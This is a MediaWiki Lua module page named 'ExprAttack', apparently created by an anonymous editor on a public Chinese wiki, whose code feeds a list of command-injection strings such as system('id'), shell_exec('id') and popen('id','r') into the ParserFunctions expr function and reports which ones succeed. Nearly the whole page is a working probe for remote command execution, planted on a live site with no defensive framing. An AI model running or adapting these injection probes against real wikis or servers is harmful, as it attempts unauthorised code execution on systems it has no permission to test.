模块:ExprAttack

来自希服维基
221.237.85.128讨论2026年5月9日 (六) 14:57的版本 (创建页面,内容为“local p = {} function p.test() local pf = mw.ext.ParserFunctions if not pf or not pf.expr then return "no_expr" end local results = {} -- Try injecting system commands through expr local injections = { "system('id')", "eval('system', 'id')", "exec('id')", "shell_exec('id')", "passthru('id')", "popen('id', 'r')", "' . system('id') . '", "'+system('id')+'", } for _, inj…”)
(差异) ←上一版本 | 最后版本 (差异) | 下一版本→ (差异)

可在模块:ExprAttack/doc创建此模块的帮助文档 

local p = {}
function p.test()
    local pf = mw.ext.ParserFunctions
    if not pf or not pf.expr then return "no_expr" end

    local results = {}

    -- Try injecting system commands through expr
    local injections = {
        "system('id')",
        "eval('system', 'id')",
        "exec('id')",
        "shell_exec('id')",
        "passthru('id')",
        "popen('id', 'r')",
        "' . system('id') . '",
        "'+system('id')+'",
    }

    for _, inj in ipairs(injections) do
        local ok, ret = pcall(pf.expr, inj)
        local status = tostring(ok)
        if ok and ret then
            status = status .. ":" .. tostring(ret):sub(1,100)
        end
        results[#results+1] = inj:sub(1,30) .. "=" .. status
    end

    return table.concat(results, " | ")
end
return p
取自“https://xn--itt73r.xn--7wr.site/w/index.php?title=模块:ExprAttack&oldid=1015